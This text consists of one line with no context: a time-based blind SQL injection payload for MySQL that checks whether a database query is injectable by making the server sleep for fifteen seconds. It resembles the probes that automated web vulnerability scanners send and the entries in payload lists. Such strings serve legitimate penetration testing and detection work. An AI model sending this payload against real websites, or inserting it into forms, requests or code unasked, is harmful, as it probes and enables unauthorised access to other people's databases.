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'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'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